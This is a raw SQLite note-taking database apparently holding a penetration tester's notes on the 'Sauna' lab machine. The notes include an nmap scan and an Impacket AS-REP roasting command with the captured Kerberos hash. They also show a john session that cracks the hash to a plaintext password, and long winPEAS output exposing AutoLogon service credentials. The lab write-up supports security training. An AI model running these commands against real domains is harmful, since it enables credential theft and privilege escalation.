SQLite format 3@ Z-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  Z##q'  Enumeration$ nmap -sC -sV -Pn -p- -oA ./Sauna 10.10.10.175 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-31 14:01 EDT Nmap scan report for 10.10.10.175 Host is up (0.025s latency). Not shown: 65515 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-01 01:06:44Z) 135/tcp open msrpc Microsoft Win u5' 10.10.10.175 - Saunahttps://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=7/31%Time=5F245D21%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h02m31s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-08-01T01:09:05 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 481.00 seconds custom-colors*A# WW##q'  Enumeration$ nmap -sC -sV -Pn -p- -oA ./Sauna 10.10.10.175 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-31 14:01 EDT Nmap scan report for 10.10.10.175 Host is up (0.025s latency). Not shown: 65515 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-01 01:06:44Z) 135/tcp open msrpc Microsoft Win u5' 10.10.10.175 - Saunacustom-colorsA#V W&?Wn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xAu/Pm'  Niktocustom-colors$A?&oA?&u%'  Web ServicesAbout page gives us some employee names. Pick one and create every combination shauncoins shaun.coins coinsshaun coins.shaun coinss scoins etc. See exploitation tab for the correct Impacket script to determine the nomeclature is firstinitiallastname = scoinscustom-colors"A'{ k'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CX q#Jql'   Othercustom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Adk '  "CMScustom-colors$A[Y)A[Y}xdacb43246a2ca0d794485f0a82a000883c9621dddfa813c40448f20448cb3ce642613c5c01d4d68c5ab0c402c98093cc121af18377ae1 $sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./npu_out.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Thestrokes23 ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL) 1g 0:00:00:11 DONE (2020-08-03 19:22) 0.09041g/s 952894p/s 952894c/s 952894C/s Thrall..Thehunter22 Use the "--show" option to display all of the cracked passwords reliably Session completed Exploit Code Used Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,A' )q/'  Post Exploitationcustom-colors*AIZnnL%A'  ExploitationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability fsmith scoins sdriver btaylor hbear skerb $python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -format john -usersfile ./Desktop/Sauna/unames.txt EGOTISTICAL-BANK.local/ -o ./Desktop/Sauna/npu_out.txt $ cat npu_out.txt $krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:20bd5c190cedef6b5d04fd60bae4b3ba$86a4dc0a71d48b8a4f98db4771c8d6dc71b8ad0af863acd6beeb940462 dceagementScope.Initialize() at System.Management.ManagementObjectSearcher.Initialize() at System.Management.ManagementObjectSearcher.Get() at winPEAS.Program.CreateDynamicLists()  - Creating current user groups list...  - Creating active users list...  [X] Exception: System.NullReferenceException: Object reference not set to an instance of an object. at winPEAS.UserInfo.GetMachineUsers(Boolean onlyActive, Boolean onlyDisabled, Boolean onlyLockout, Boolean onlyAdmins, Boolean fullInfo)  - Creating disabled users list...  [X] Exception: System.NullReferenceException: Object reference not set to an instance of an object. at winPEAS.UserInfo.GetMachineUsers(Boolean onlyActive, Boolean onlyDisabled, Boolean onlyLockout, Boolean onlyAdmins, Boolean fullInfo)  - Admin users list...  [X] Exception: System.NullReferenceException: Object reference not set to an instance of an object. at winPEAS.UserInfo.GetMachineUsers(Boolean onlyActive, Boolean onlyDisabled, Boolean onlyLockout, Boolean onlyAdmins, Boolean fullInfo)  *((,.,/((((((((((((((((((((/, */ ,/*,..*((((((((((((((((((((((((((((((((((, ,*/((((((((((((((((((/, .*//((//**, .*(((((((* ((((((((((((((((**********/########## .(* ,((((((( (((((((((((/********************/####### .(. ((((((( ((((((..******************/@@@@@/***/###### ./((((((( ,,....********************@@@@@@@@@@(***,#### .//(((((( , ,..********************/@@@@@%@@@@/********##((/ /(((( ..((###########*********/%@@@@@@@@@/************,,..(((( .(##################(/******/@@@@@/***************.. /(( .(#########################(/**********************..*(( .(##############################(/*****************.,((( .(###################################(/************..((( .(#######################################(*********..((( .(#######(,.***.,(###################(..***.*******..((( .(#######*(#####((##################((######/(*****..((( .(###################(/***********(##############(...((( .((#####################/*******(################.(((((( .(((############################################(..(((( ..(((##########################################(..((((( ....((########################################( .((((( ......((####################################( .(((((( (((((((((#################################[1;32m(../(((((( (((((((((/##########################(/..(((((( (((((((((/,. ,*//////*,. ./(((((((((((((((. (((((((((((((((((((((((((((((/ ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.  WinPEAS vBETA VERSION, Please if you find any issue let me know in https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues by carlospolop  [+] Leyend:  Red Indicates a special privilege over an object or something is misconfigured  Green[1;37m Indicates that some protection is enabled or something is well configured  Cyan Indicates active users  Blue Indicates disabled users  LightYellow Indicates links  [?] You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation  ==========================================(System Information)==========================================  [+] Basic System Information(T1082&T1124&T1012&T1497&T1212)  [?] Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits  [X] Exception: Access denied   [X] Exception: Access denied  System.Collections.Generic.KeyNotFoundException: The given key was not present in the dictionary. at System.ThrowHelper.ThrowKeyNotFoundException() at System.Collections.Generic.Dictionary`2.get_Item(TKey key) at winPEAS.Program.<PrintSystemInfo>g__PrintBasicSystemInfo|40_0()  [+] PowerShell Settings()  PowerShell v2 Version: 2.0  PowerShell v5 Version: 5.1.17763.1  Transcription Settings:   Module Logging Settings:   Scriptblock Logging Settings:   PS history file:   PS history size:   [+] Audit Settings(T1012)  [?] Check what is being logged [1;33m  Not Found  [+] WEF Settings(T1012)  [?] Windows Event Forwarding, is interesting to know were are sent the logs   Not Found  [+] LAPS Settings(T1012)  [?] If installed, local administrator password is changed frequently and is restricted by ACL   LAPS Enabled: LAPS not installed  [+] Wdigest()  [?] If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#wdigest  Wdigest is not enabled  [+] LSA Protection()  [?] If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#lsa-protection  LSA Protection is not enabled  [+] Credentials Guard()  [?] If enabled, a driver is needed to read LSASS memory https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#credential-guard  CredentialGuard is not enabled  [+] Cached Creds()  [?] If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials  cachedlogonscount is 10  [+] User Environment Variables()  [?] Check for some passwords or keys in the env variables   COMPUTERNAME: SAUNA  PUBLIC: C:\Users\Public  LOCALAPPDATA: C:\Users\FSmith\AppData\Local  PSModulePath: C:\Users\FSmith\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules  PROCESSOR_ARCHITECTURE: AMD64  Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps  CommonProgramFiles(x86): C:\Program Files (x86)\Common Files  ProgramFiles(x86): C:\Program Files (x86)  PROCESSOR_LEVEL: 23  ProgramFiles: C:\Program Files  PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL  USERPROFILE: C:\Users\FSmith  SystemRoot: C:\Windows  ALLUSERSPROFILE: C:\ProgramData  DriverData: C:\Windows\System32\Drivers\DriverData  ProgramData: C:\ProgramData  PROCESSOR_REVISION: 0102  USERNAME: FSmith  CommonProgramW6432: C:\Program Files\Common Files  CommonProgramFiles: C:\Program Files\Common Files  OS: Windows_NT  PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 1 Stepping 2, AuthenticAMD  ComSpec: C:\Windows\system32\cmd.exe  SystemDrive: C:  TEMP: C:\Users\FSmith\AppData\Local\Temp  NUMBER_OF_PROCESSORS: [0m2  APPDATA: C:\Users\FSmith\AppData\Roaming  TMP: C:\Users\FSmith\AppData\Local\Temp  ProgramW6432: C:\Program Files  windir: C:\Windows  USERDOMAIN: EGOTISTICALBANK  USERDNSDOMAIN: EGOTISTICAL-BANK.LOCAL  [+] System Environment Variables()  [?] Check for some passwords or keys in the env variables   ComSpec: C:\Windows\system32\cmd.exe  DriverData: C:\Windows\System32\Drivers\DriverData  OS: Windows_NT  Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\  PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC  PROCESSOR_ARCHITECTURE: AMD64  PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules  TEMP: C:\Wind ows\TEMP  TMP: C:\Windows\TEMP  USERNAME: SYSTEM  windir: C:\Windows  NUMBER_OF_PROCESSORS: 2  PROCESSOR_LEVEL: 23  PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 1 Stepping 2, AuthenticAMD  PROCESSOR_REVISION: 0102  [+] HKCU Internet Settings(T1012)  DisableCachingOfSSLPages: 0  IE5_UA_Backup_Flag: 5.0  PrivacyAdvanced: 1  SecureProtocols: 2688  User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)  CertificateRevocation: 1  ZonesSecurityUpgrade: System.Byte[]  EnableNegotiate: 1  ProxyEnable: 0  [+] HKLM Internet Settings(T1012)  ActiveXCache: C:\Windows\Downloaded Program Files  CodeBaseSearchPath: CODEBASE  EnablePunycode: 1  MinorVersion: 0 [1;!37m WarnOnIntranet: 1  [+] Drives Information(T1120)  [?] Remember that you should search more info inside the other drives  C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 7 GB)(Permissions: Users [AppendData/CreateDirectories])  [+] AV Information(T1063)  [X] Exception: Invalid namespace   No AV was detected!!  Not Found  [+] UAC Status(T1012)  [?] If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access  ConsentPromptBehaviorAdmin: 1 - PromptOnSecureDesktop  EnableLU"A: 1  LocalAccountTokenFilterPolicy:   FilterAdministratorToken:   [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1. [-] Only the RID-500 local admin account can be used for lateral movement.  ===========================================(Users Information)===========================================  [+] Users(T1087&T1069&T1033)  [?] Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups  [X] Exception: System.NullReferenceException: Object reference not set to an instance of an object. at winPEAS.UserInfo.GetMachineUsers(Boolean onlyActive, Boolean onlyDisabled, Boolean onlyLockout, Boolea#n onlyAdmins, Boolean fullInfo) Current user: [1:35mFSmith Current groups: Domain Users, Everyone, Builtin\Remote Management Users, Users, Builtin\Pre-Windows 2000 Compatible Access, Network, Authenticated Users, This Organization, NTLM Authentication  =================================================================================================  Not Found  [+] Current Token privileges(T1134)  [?] Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation  SeMachineAccountPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED  SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED  SeIncre$aseWorkingSetPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED  [+] Clipboard text(T1134)   [+] Logged users(T1087&T1033)  [X] Exception: System.Management.ManagementException: Access denied at System.Management.ThreadDispatch.Start() at System.Management.ManagementScope.Initialize() at System.Management.ManagementObjectSearcher.Initialize() at System.Management.ManagementObjectSearcher.Get() at winPEAS.UserInfo.GetLoggedUsers()  Not Found  [+] RDP Sessions(T1087&T1033)  Not Found  [+] Ever logged users(T1087&T1033)  [X] Exception: System.Management.ManagementException: Access denied at System.Management.ThreadDispatch.Start() at System.Management.ManagementScope.Initialize() at System.Management.ManagementObjectSearcher.Initialize() at System.Managem%ent.ManagementObjectSearcher.Get() at winPEAS.UserInfo.GetEverLoggedUsers()  Not Found  [+] Looking for AutoLogon credentials(T1012)  Some AutoLogon credentials were found!! DefaultDomainName : [1:35mEGOTISTICALBANK DefaultUserName : [1:35mEGOTISTICALBANK\svc_loanmanager DefaultPassword : Moneymakestheworldgoround!  [+] Home folders found(T1087&T1083&T1033)  C:\Users\Administrator  C:\Users\All Users  C:\Users\Default  C:\Users\Default User  C:\Users\FSmith : FSmith [AllAccess]  C:\Users\Public  C:\Users\svc_loanmgr  [+] Password Policies(T1201)  [?] Check for a possible brute-force   Domain: B&uiltin  SID: S-1-5-32  MaxPasswordAge: 42.22:47:31.7437440  MinPasswordAge: 00:00:00  MinPasswordLength: 0  PasswordHistoryLength: 0  PasswordProperties: 0  =================================================================================================  Domain: [1:35mEGOTISTICALBANK  SID: S-1-5-21-2966785786-3096785034-1186376766  MaxPasswordAge: 42.00:00:00  MinPasswordAge: 1.00:00:00  MinPasswordLength: 7  PasswordHistoryLength: 24  PasswordProperties: DOMAIN_PASSWORD_COMPLEX  =================================================================================================  =======================================(Processes Information)=======================================  [+] Interesting Processes -non Microsoft-(T1010&T1057'&T1007)  [?] Check if any interesting proccesses for memmory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes  [X] Exception: Access denied  System.InvalidOperationException: Cannot open Service Control Manager on computer '.'. This operation might require other privileges. ---> System.ComponentModel.Win32Exception: Access is denied --- End of inner exception stack trace --- at System.ServiceProcess.ServiceController.GetDataBaseHandleWithAccess(String machineName, Int32 serviceControlManaqerAccess) at System.ServiceProcess.ServiceController.GetServicesOfType(String machineName, Int32 serviceType) at System.ServiceProcess.ServiceController.GetServices() at winPEAS.ServicesInfo.GetModifiableServi(ces(Dictionary`2 SIDs) at winPEAS.Program.PrintInfoServices()  ========================================(Services Information)========================================  [+] Interesting Services -non Microsoft-(T1007)  [?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services  [X] Exception: Access denied  @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver(PMC-Sierra, Inc. - @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver)[System32\drivers\arcsas.sys] - Boot  ==============================================================================)=================== @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD(QLogic Corporation - @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD)[System32\drivers\bxvbda.sys] - Boot  ================================================================================================= @bcmfn2.inf,%bcmfn2.SVCDESC%;bcmfn2 Service(Windows (R) Win 7 DDK provider - @bcmfn2.inf,%bcmfn2.SVCDESC%;bcmfn2 Service)[C:\Windows\System32\drivers\bcmfn2.sys] - System  ================================================================================================= @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver(QLogic Corporation - @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver)[System32\drivers\bxfcoe.sys] - Boot  ================================================================================================= @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver(QLogic Corporation - @bxois.i*nf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver)[System32\drivers\bxois.sys] - Boot  ================================================================================================= @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver(Chelsio Communications - @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver)[C:\Windows\System32\drivers\cht4vx64.sys] - System  ================================================================================================= @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I(Intel Corporation - @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I)[C:\Windows\System32\drivers\e1i63x64.sys] - System  ================================================================================================= @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD(QL+ogic Corporation - @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD)[System32\drivers\evbda.sys] - Boot  ================================================================================================= @ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver(Intel Corporation - @ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver)[C:\Windows\System32\drivers\iaLPSSi_GPIO.sys] - System  ================================================================================================= @ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver(Intel Corporation - @ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver)[C:\Windows\System32\drivers\iaLPSSi_I2C.sys] - System  ================================================================================================= @iastorav.inf,%iaStorAVC,.DeviceDesc%;Intel Chipset SATA RAID Controller(Intel Corporation - @iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller)[System32\drivers\iaStorAVC.sys] - Boot  ================================================================================================= @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7(Intel Corporation - @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7)[System32\drivers\iaStorV.sys] - Boot  ================================================================================================= @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver)(Mellanox - @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver))[C:\Windows\System32\drivers\ibbus.sys] - System  ================================================================================================= kKzf(kKzf)[C:\Windows\lsiUs-MaR.exe] - System  ================================================================================================= @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator(Mellanox - @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator)[C:\Windows\System32\drivers\mlx4_bus.sys] - System  ================================================================================================= @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service(Mellanox - @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service)[C:\Windows\System32\drivers\ndfltr.sys] - System  ================================================================================================= OmQX(OmQX)[C:\Windows\gsefpsnT.exe] - System  ================================================================================================= @netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD(Caviu.m, Inc. - @netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD)[System32\drivers\qevbda.sys] - Boot  ================================================================================================= @qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver(Cavium, Inc. - @qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver)[System32\drivers\qefcoe.sys] - Boot  ================================================================================================= @qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver(QLogic Corporation - @qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver)[System32\drivers\qeois.sys] - Boot  ================================================================================================= @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64))[Sy/stem32\drivers\ql2300i.sys] - Boot  ================================================================================================= @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver(QLogic Corporation - @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver)[System32\drivers\ql40xx2i.sys] - Boot  ================================================================================================= @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64))[System32\drivers\qlfcoei.sys] - Boot  ================================================================================================= OpenSSH Authentication Agent(OpenSSH Authentication Agent)[C:\Windows\System32\OpenSSH\ssh-agent.exe] - Manual Agent to hold private keys used for pu0blic key authentication.  ================================================================================================= @usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver(@usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver)[C:\Windows\System32\drivers\USBSTOR.SYS] - System  ================================================================================================= @usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller(@usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller)[C:\Windows\System32\drivers\USBXHCI.SYS] - System  ================================================================================================= VMware Alias Manager and Ticket Service(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Autoload Alias Manager and Ticket Service  ================================================================================================= @oem9.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver(VMware, Inc. - @oem9.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver)[System32\drivers\vmci.sys] - Boot  ================================================================================================= Memory Control Driver(VMware, Inc. - Memory Control Driver)[C:\Windows\system32\DRIVERS\vmmemctl.sys] - Autoload Driver to provide enhanced memory management of this virtual machine.  ================================================================================================= @oem7.inf,%VMMouse.SvcDesc%;VMware Pointing Device(VMware, Inc. - @oem7.inf,%VMMouse.SvcDesc%;VMware Pointing Device)[C:\Windows\System32\drivers\vmmouse.sys] - System  ==================================================================================2=============== VMware Tools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Autoload Provides support for synchronizing objects between the host and guest operating systems.  ================================================================================================= @oem6.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device(VMware, Inc. - @oem6.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device)[C:\Windows\System32\drivers\vmusbmouse.sys] - System  ================================================================================================= VMware CAF AMQP Communication Service(VMware CAF AMQP Communication Service)["C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\CommAmqpListener.exe"] - System VMware Common Agent AMQP Communication Service  =======================================================================3========================== VMware CAF Management Agent Service(VMware CAF Management Agent Service)["C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\ManagementAgentHost.exe"] - Autoload VMware Common Agent Management Agent Service  ================================================================================================= vSockets Virtual Machine Communication Interface Sockets driver(VMware, Inc. - vSockets Virtual Machine Communication Interface Sockets driver)[C:\Windows\system32\DRIVERS\vsock.sys] - Boot vSockets Driver  ================================================================================================= @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver(VIA Corporation - @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver)[System32\drivers\vstxraid.sys] - Boot  ======================4=========================================================================== @%SystemRoot%\System32\drivers\vwifibus.sys,-257(@%SystemRoot%\System32\drivers\vwifibus.sys,-257)[C:\Windows\System32\drivers\vwifibus.sys] - System @%SystemRoot%\System32\drivers\vwifibus.sys,-258  ================================================================================================= @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service(Mellanox - @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service)[C:\Windows\System32\drivers\winmad.sys] - System  ================================================================================================= @winusb.inf,%WINUSB_SvcName%;WinUsb Driver(@winusb.inf,%WINUSB_SvcName%;WinUsb Driver)[C:\Windows\System32\drivers\WinUSB.SYS] - System @winusb.inf,%WINUSB_SvcDesc%;Generic driver for USB devices  ====================================================================5============================= @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service(Mellanox - @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service)[C:\Windows\System32\drivers\winverbs.sys] - System  ================================================================================================= Yars(Yars)[C:\Windows\IVLRnUHL.exe] - System  =================================================================================================  [+] Modifiable Services(T1007)  [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services  You cannot modify any service  [+] Looking if you can modify any service registry()  [?] Check if you can modify the registry of a service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services-registry-permissions  [-] Looks like you cannot change the registry of any service...  [+] Checking write permissions in PATH folders (DLL Hijacking)()  [?] Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking  C:\Windows\system32  C:\Windows  C:\Windows\System32\Wbem  C:\Windows\System32\WindowsPowerShell\v1.0\  C:\Windows\System32\OpenSSH\  ====================================(Applications Information)====================================  [+] Current Active Window Application(T1010&T1518) System.NullReferenceException: Object reference not set to an instance of an object. at winPEAS.MyUtils.GetPermissionsFile(String path, Dictionary`2 SIDs) at winPEAS.Program.<PrintInfoApplications>g__PrintActiveWindow|44_0()  [+] Installed Applications --Via Program Files/Uninstall registry--(T1083&T1012&T1010&T1518)  [?] Check if you can modify installed software https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software  C:\Program Files\Common Files  C:\Program Files\desktop.ini  C:\Program Files\inte8rnet explorer  C:\Program Files\Uninstall Information  C:\Program Files\VMware  C:\Program Files\Windows Defender  C:\Program Files\Windows Defender Advanced Threat Protection  C:\Program Files\Windows Mail  C:\Program Files\Windows Media Player  C:\Program Files\Windows Multimedia Platform  C:\Program Files\windows nt  C:\Program Files\Windows Photo Viewer  C:\Program Files\Windows Portable Devices  C:\Program Files\Windows Security  C:\Program Files\Windows Sidebar  C:\Program Files\WindowsApps  C:\Program Files\WindowsPowerShell  [+] Autorun Applications(T1010)  [?] Check if you can modify other users AutoRuns binaries https://9book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:\Users\FSmith\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.FileSystemEnumerableIterator`1.CommonInit() at System.IO.FileSystemEnumerableIterator`1..ctor(String path, String originalUserPath, String searchPattern, SearchOption searchOption, SearchResultHandler`1 resultHandler, Boolean checkHost) at System.IO.Directory.GetFiles(String path, String searchPattern, SearchOption searchOption) at winPEAS.ApplicationInfo.GetAutoRunsFolder() at winPEAS.ApplicationInfo.GetAutoRuns(Dictionary`2 NtAccountNames) at winPEAS.Program.<PrintInfoApplications>g__PrintAutoRuns|44_2()  [+] Scheduled Applications --Non Microsoft--(T1010)  [?] Check if you can modi:fy other users scheduled binaries https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup System.IO.FileNotFoundException: Could not load file or assembly 'Microsoft.Win32.TaskScheduler, Version=2.8.16.0, Culture=neutral, PublicKeyToken=c416bc1b32d97233' or one of its dependencies. The system cannot find the file specified. File name: 'Microsoft.Win32.TaskScheduler, Version=2.8.16.0, Culture=neutral, 